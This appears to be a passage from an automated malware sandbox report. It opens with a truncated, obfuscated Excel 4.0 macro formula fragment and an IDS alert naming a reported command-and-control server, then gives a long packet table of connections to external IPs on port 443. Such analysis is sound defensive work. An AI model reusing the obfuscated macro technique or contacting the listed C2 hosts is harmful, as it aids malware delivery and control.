A4)&'Sheet4'!O33)&'Sheet2'!F10)&'Sheet4'!L23)&'Sheet4'!F20)&'Sheet6'!Q12)&'Sheet2'!F24)&'Sheet2'!L31,F38))=FORMULA((('Sheet2'!L24&'Sheet2'!G44)&'Sheet2'!H46)&'Sheet2'!J44,F40), 36 |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
192.168.2.22180.250.21.2491814432404316 07/01/22-11:38:36.385572 | TCP | 2404316 | ET CNC Feodo Tracker Reported CnC Server TCP group 9 | 49181 | 443 | 192.168.2.22 | 180.250.21.2 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jul 1, 2022 11:37:51.877506971 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:51.877592087 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:51.877674103 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:51.887459040 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:51.887515068 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.023860931 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.023994923 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.034481049 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.034498930 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.034954071 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.035034895 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.263261080 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.304502964 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.401010036 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.401272058 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.401314020 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.401335001 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.401448011 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.401478052 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.401567936 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.401705027 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.401796103 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.401861906 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.401958942 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.405690908 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.463301897 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.463435888 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.463537931 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.463572025 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.463587046 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.463644028 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.463711977 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.463732958 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.463782072 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.463829041 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.463857889 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.463967085 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.464124918 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.464231968 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.464263916 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.464359045 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.464492083 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.526048899 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.526228905 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.526236057 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.526263952 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.526340008 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.526376963 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.526515961 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.526602030 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.526635885 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.526712894 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.526767015 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.526904106 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.526978970 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.527028084 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.527111053 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.527285099 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.527380943 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.527405024 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.527481079 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.527631044 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.527718067 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.527750015 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.527828932 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.528026104 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.528266907 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.528373957 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.528388023 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.528412104 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.528461933 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.528738022 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.528837919 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.528857946 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.528939009 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.529310942 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.590384960 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.590523958 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.590689898 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.590728998 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.590759039 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.590818882 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.590826988 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.590854883 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.590879917 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.590892076 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.590907097 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.590935946 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.590976000 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.591123104 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.591231108 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.591243029 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.591260910 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.591331005 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.591466904 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.591547012 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.591584921 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.591670990 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.591799974 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.591880083 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.591918945 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.591928005 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.592012882 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.592217922 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.592308998 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.592338085 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.592422962 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.592616081 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.592699051 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.592731953 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.592808962 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.592968941 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.593046904 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.593087912 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.593178988 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.593354940 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.593453884 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.593488932 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.593569040 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.593724966 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.593822002 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.593842983 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.593940020 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.594080925 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.594176054 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.594197989 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.594281912 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.607795000 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.696896076 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.697026014 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.697062016 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.697103024 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.697118998 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.697124004 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.697146893 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.697288990 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.697380066 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.697396994 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.697467089 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.697591066 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.697657108 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.697698116 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.697763920 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.697886944 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.697953939 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.697998047 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.698064089 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.698184967 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.698254108 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.698292017 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.698357105 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.698481083 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.698546886 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.698589087 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.698653936 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.698781967 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.698848009 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.698889017 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.698965073 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.699079037 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.699146032 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.699184895 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.699250937 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.699373007 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.699465036 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.699489117 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.699508905 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.699563026 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.699577093 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.699651003 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.699738979 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.699753046 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.699768066 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.699822903 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.699879885 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.699948072 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.699965000 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.699987888 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.699997902 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.700032949 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.700047016 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.700053930 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.700074911 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:52.700103998 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.700150967 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.721421957 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.729779005 CEST | 49171 | 443 | 192.168.2.22 | 212.98.224.29 |
Jul 1, 2022 11:37:52.729809999 CEST | 443 | 49171 | 212.98.224.29 | 192.168.2.22 |
Jul 1, 2022 11:37:55.181243896 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.181298018 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.181763887 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.181816101 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.181828022 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.282658100 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.282962084 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.300024986 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.300052881 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.300702095 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.301352024 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.323929071 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.368494987 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.413022995 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.413306952 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.413325071 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.413466930 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.458342075 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.458357096 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.458452940 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.458499908 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.458517075 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.458528996 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.458560944 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.458565950 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.458579063 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.458626032 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.458667994 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.458678007 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.458738089 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.458748102 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.459286928 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.503856897 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.503914118 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.504002094 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.504045963 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.504060030 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.504112959 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.504165888 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.504329920 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.504380941 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.504400969 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.504437923 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.504443884 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.504498005 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.504507065 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.504772902 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.549266100 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.549323082 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.549371958 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.549384117 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.549391985 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.549427032 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.549597025 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.549645901 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.549652100 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.549655914 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.549659967 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.549741983 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.549789906 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.549793005 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.549793959 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.549806118 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.549880981 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.550024986 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.550074100 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.550117016 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.550122976 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.550131083 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.550156116 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.550210953 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.550261021 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.550302029 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.550307035 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.550337076 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.550340891 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.550425053 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.550426006 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.550436020 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.550483942 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.550487995 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
Jul 1, 2022 11:37:55.550494909 CEST | 443 | 49172 | 213.128.75.146 | 192.168.2.22 |
Jul 1, 2022 11:37:55.551310062 CEST | 49172 | 443 | 192.168.2.22 | 213.128.75.146 |
